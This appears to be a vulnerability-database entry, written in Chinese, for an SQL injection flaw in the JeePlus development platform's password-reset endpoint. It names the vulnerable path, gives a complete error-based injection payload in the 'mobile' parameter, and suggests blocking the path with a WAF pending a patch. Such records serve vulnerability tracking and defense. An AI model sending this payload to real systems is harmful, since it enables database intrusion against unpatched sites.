vendor = "JeePlus"
name = "JeePlus快速开发平台resetpassword存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/kjds2022/a/sys/user/resetPassword?mobile="
detail = "/kjds2022/a/sys/user/resetPassword?mobile=18888888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23"
fix = "WAF封禁路路径，等待发布补丁"
date = "0726"
label = "nday"
